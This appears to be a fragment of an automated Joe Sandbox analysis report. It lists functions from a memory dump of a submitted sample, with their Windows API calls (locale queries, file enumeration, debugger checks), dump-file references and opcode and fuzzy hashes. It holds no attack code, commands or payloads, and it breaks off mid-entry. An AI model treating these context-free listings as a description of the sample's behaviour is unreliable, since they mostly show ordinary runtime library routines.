Instruction ID: bc8d4bbd0d2f7ba784b444d6b3f94449589d82ee2e5038c1b3a6a70d857f2763
Opcode Fuzzy Hash: a6e8bc42482da3edde67a03c0f48bb48c5d44e5488764de2fae6303764f2f884
Instruction Fuzzy Hash: A1517E313052048FC715DF6DC9A4B6AB7E6EB88728F19866CE959CB3E2D630ED05CB41

Function 00303C29 Relevance: 1.6, APIs: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36966f8cd1c8b0126ff99a1f315929ba08d383f7774a7915be06e8f4066abb0
Instruction ID: fa1510c6965e2fc84f3e54ea3f0332743894ccb80fa8c254afa351db9f4c183b
Opcode Fuzzy Hash: e36966f8cd1c8b0126ff99a1f315929ba08d383f7774a7915be06e8f4066abb0
Instruction Fuzzy Hash: 8E31967250511AAFCF16CF68D8A49EDB7FDBF09320B14022AE512E76D0D731EA44CB90

Function 00303C1B Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: 5751bfb154ce45225c6fceac3b716c938b71118cf5b6262672532fe0b96c37f9
Instruction ID: 17d55dba9ffb2bc5c9170626dac400c83028e5f0458a61c4f879b6e44b57e084
Opcode Fuzzy Hash: 5751bfb154ce45225c6fceac3b716c938b71118cf5b6262672532fe0b96c37f9
Instruction Fuzzy Hash: 9B01F43660A2565FCB17CB78E9793A9BB64FF86335F20416FD002DA5D1CB225A20D350

Function 0030E531 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,003031E1,0030186A,?,003060C1,0030186C,0030186A,?,?,?,00303181,003031E1,0030186E,0030186A,0030186A,0030186A), ref: 0030E563

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 72301e6d7c985691142e8c1b1ba937f56fbb5cefaf60a07bb405036d74f04ac7
Instruction ID: 07dc80d6adcd069d23532204398ed08a087bae0bf2d6e0f0dbe82f96a3514333
Opcode Fuzzy Hash: 72301e6d7c985691142e8c1b1ba937f56fbb5cefaf60a07bb405036d74f04ac7
Instruction Fuzzy Hash: EEE0ED32B0322166DA336B66BC31B5A7A4C9F037B8F160E21AC959B4D1EB60CD0081E0

Non-executed Functions

Function 00313178 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00312B49,00000002,00000000,?,?,?,00312B49,?,00000000), ref: 00313211
GetLocaleInfoW.KERNEL32(?,20001004,00312B49,00000002,00000000,?,?,?,00312B49,?,00000000), ref: 0031323A
GetACP.KERNEL32(?,?,00312B49,?,00000000), ref: 0031324F

Strings

OCP, xrefs: 003131CC
ACP, xrefs: 00313196

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 31af35c6b71e2d962365d71d40d21a60b33455a1e4ff40e152bb062977844421
Instruction ID: 907724229b9681246551c6aaacabae83fa255140d81345fc7e9860694cd62ca5
Opcode Fuzzy Hash: 31af35c6b71e2d962365d71d40d21a60b33455a1e4ff40e152bb062977844421
Instruction Fuzzy Hash: 92213C32604104BADB3AAB54DD05BE777AAAF5CB50B678824E90AD7110E732DFC2D350

Function 00312A13 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0030E783: GetLastError.KERNEL32(00000000,?,00310AB9), ref: 0030E787
Part of subcall function 0030E783: SetLastError.KERNEL32(00000000,?,?,00000028,0030B9D2), ref: 0030E829

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00312B1B
IsValidCodePage.KERNEL32(00000000), ref: 00312B59
IsValidLocale.KERNEL32(?,00000001), ref: 00312B6C
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00312BB4
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00312BCF

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: f6ba89b025db9b26e7d5dd96e985f0bbbc60776405022b1e093e9474b76120d7
Instruction ID: 65aa9ed6ca9f3e7f98f5de153f46f1db278d6bb9d3eecaa1b4b9af8182aa8840
Opcode Fuzzy Hash: f6ba89b025db9b26e7d5dd96e985f0bbbc60776405022b1e093e9474b76120d7
Instruction Fuzzy Hash: 77517171A00215AFDB2ADFA4CC45AFF77B8FF1C700F158469A910EB190DB709A91CB61

Function 0031375A Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0031384A

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 5f4a032ba484e039fe4aef7b47d35641843afeee5091515f22fc5e02ad112349
Instruction ID: 3c147f8b7bc21c8fc736ff5968b1e6af3409f9f25e4db9ca76378f279e5ffa12
Opcode Fuzzy Hash: 5f4a032ba484e039fe4aef7b47d35641843afeee5091515f22fc5e02ad112349
Instruction Fuzzy Hash: AE71B3B19051695EDF2A9F288C9DBFAB7B9AB09300F1441DAE04997251DB354FC58F10

Function 00305020 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0030502C
IsDebuggerPresent.KERNEL32 ref: 003050F8
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00305111
UnhandledExceptionFilter.KERNEL32(?), ref: 0030511B

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: e15e3b71a9bdca2b29acf69ec4e6ef94e7420c38c20a8c34ba0ce6f229112468
Instruction ID: 9101f973dcff5caa5318c276342dde27977201d82454d3b63f1c748f992007eb
Opcode Fuzzy Hash: e15e3b71a9bdca2b29acf69ec4e6ef94e7420c38c20a8c34ba0ce6f229112468
Instruction Fuzzy Hash: 923129B5D062189BDF21DF64D9497CDBBB8AF08300F1041AAE40CAB290EB759B858F44

Function 00312CFF Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0030E783: GetLastError.KERNEL32(00000000,?,00310AB9), ref: 0030E787
Part of subcall function 0030E783: SetLastError.KERNEL32(00000000,?,?,00000028,0030B9D2), ref: 0030E829

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00312D53
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00312D9D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00312E63

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: c60a3b7ec7cda505c390373d5bf2c0f0e87fb4e39a8c22f059a1c05fc3569e8c
Instruction ID: ed6be11452c814ffbd8a34344867c14c447f56a61108bd632e940758a3880305
Opcode Fuzzy Hash: c60a3b7ec7cda505c390373d5bf2c0f0e87fb4e39a8c22f059a1c05fc3569e8c
Instruction Fuzzy Hash: D16180719111079FDB2E9F28CC82BEB77A8FF18300F15416AE905CA585E774D9E1CB60

Function 0030B4B9 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,003031E1), ref: 0030B5B1
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,003031E1), ref: 0030B5BB
UnhandledExceptionFilter.KERNEL32(00301542,?,?,?,?,?,003031E1), ref: 0030B5C8

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2b3a0db9a0e9a358be76373b3c2b9acb142a9609c07377e6ad7615fb59e58286
Instruction ID: 44d0228e93276fe113bf72899f94754b27f2ff853f364ec0a7e514994f93b32a
Opcode Fuzzy Hash: 2b3a0db9a0e9a358be76373b3c2b9acb142a9609c07377e6ad7615fb59e58286
Instruction Fuzzy Hash: E331B87490122DABCB22DF68DD8978DBBB8BF18710F5041EAE41CA7291E7749F858F44

Function 003136A9 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0030F807: HeapAlloc.KERNEL32(00000008,?,003031E1,?,0030E921,00000001,00000364,003031E1,00000003,000000FF,?,003060C1,0030186C,0030186A,?,?), ref: 0030F848

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0031384A
FindNextFileW.KERNEL32(00000000,?), ref: 0031393E
FindClose.KERNEL32(00000000), ref: 0031397D
FindClose.KERNEL32(00000000), ref: 003139B0

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: Find$CloseFile$AllocFirstHeapNext
String ID:
API String ID: 2701053895-0
Opcode ID: a8e7d51375416c0ba04a87af165ad20e171f8c568480f267763536ac287e65e0
Instruction ID: e260d48bef473835b848c63115a48a881be71297810d43658178312387d52a7d
Opcode Fuzzy Hash: a8e7d51375416c0ba04a87af165ad20e171f8c568480f267763536ac287e65e0
Instruction Fuzzy Hash: DE517BB5A00118AFDF1A9F288CD5DFEB7ADDF89314F1441ADF44997281EA309F818B60

Function 00312FB1 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0030E783: GetLastError.KERNEL32(00000000,?,00310AB9), ref: 0030E787
Part of subcall function 0030E783: SetLastError.KERNEL32(00000000,?,?,00000028,0030B9D2), ref: 0030E829

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00313005

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: e30b2e28982ee66dfa88d8a84a21ac18461cbf9167236a048acc5d746d0e15f3
Instruction ID: 2a5a532a832d4222d2d509b45b832777055209ad642d6dd1d4130d6e1f2a3358
Opcode Fuzzy Hash: e30b2e28982ee66dfa88d8a84a21ac18461cbf9167236a048acc5d746d0e15f3
Instruction Fuzzy Hash: 5921B371641606ABDB2E9B19DC51ABB73ECEF0C700F100069F902DA185EB34DE80C790

Function 003130D1 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 0030E783: GetLastError.KERNEL32(00000000,?,00310AB9), ref: 0030E787
Part of subcall function 0030E783: SetLastError.KERNEL32(00000000,?,?,00000028,0030B9D2), ref: 0030E829

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00313125

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 84ce0119c8d4884b16158621dbd7502744799fc3a9016dad7918607bc91fe909
Instruction ID: cbbcbe4ae16a6487666844941a2195075bfae20feb49138fec9f155a83ab59df
Opcode Fuzzy Hash: 84ce0119c8d4884b16158621dbd7502744799fc3a9016dad7918607bc91fe909
Instruction Fuzzy Hash: 7911E972651216BBD72AAB28DC56AFA77ECEF09710F10017AF501DB280EB74EE418790

Function 00312C64 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0030E783: GetLastError.KERNEL32(00000000,?,00310AB9), ref: 0030E787
Part of subcall function 0030E783: SetLastError.KERNEL32(00000000,?,?,00000028,0030B9D2), ref: 0030E829

EnumSystemLocalesW.KERNEL32(00312CFF,00000001,00000000,?,-00000050,?,00312AEF,00000000,-00000002,00000000,?,00000055,?), ref: 00312CD6

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: f2c1066a5ec9e2b194c0a02784ce7dd114d87a27f25fea250a77d264dd03d375
Instruction ID: 55cd0b85a92901c010cbd1ac0687dc55d4b8dd96e231941946d4ed54467b35f1
Opcode Fuzzy Hash: f2c1066a5ec9e2b194c0a02784ce7dd114d87a27f25fea250a77d264dd03d375
Instruction Fuzzy Hash: 7C11E93B2007055FDB1DAF39C8916BBB792FF84758B15482CEA4647B40D771A993D780

Function 0031327E Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0030E783: GetLastError.KERNEL32(00000000,?,00310AB9), ref: 0030E787
Part of subcall function 0030E783: SetLastError.KERNEL32(00000000,?,?,00000028,0030B9D2), ref: 0030E829

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00312F1B,00000000,00000000,?), ref: 003132AA

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 185e0535487c84c3dce23b97d149a97429ea2f2ac0abe0f08bdb623f257ba431
Instruction ID: 6f59b65b4c051f12ab3ef072caf5fe0a3903489b697942aad86b1abbe59ee700
Opcode Fuzzy Hash: 185e0535487c84c3dce23b97d149a97429ea2f2ac0abe0f08bdb623f257ba431
Instruction Fuzzy Hash: 3A012B32601112BBDB1D6724C806BFA3758DB48B14F160839AC12A3180EA71EF92C694

Function 00312F52 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0030E783: GetLastError.KERNEL32(00000000,?,00310AB9), ref: 0030E787
Part of subcall function 0030E783: SetLastError.KERNEL32(00000000,?,?,00000028,0030B9D2), ref: 0030E829

EnumSystemLocalesW.KERNEL32(00312FB1,00000001,?,?,-00000050,?,00312AB7,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00312F9C

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 5c175b377b26d0089d4a8b755886c583023111a8c2928e20e52e6bdec016a8d6
Instruction ID: 27d2677338cb5de50230601c4a59643001fbcae22bc1464eb43a5a3668abbc37
Opcode Fuzzy Hash: 5c175b377b26d0089d4a8b755886c583023111a8c2928e20e52e6bdec016a8d6
Instruction Fuzzy Hash: 1EF0F6363003045FDB2A5F399881BBB7BA5EF84768F06842CF9454B680C7B19C83C750

Function 0030F717 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0030B750: EnterCriticalSection.KERNEL32(-00023A67,?,00308F5A,00000000,003244D8,0000000C,00308F13,?,?,0030F83A,?,?,0030E921,00000001,00000364,003031E1), ref: 0030B75F

EnumSystemLocalesW.KERNEL32(0030F70A,00000001,00324928,0000000C,0030F118,-00000050), ref: 0030F74F

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
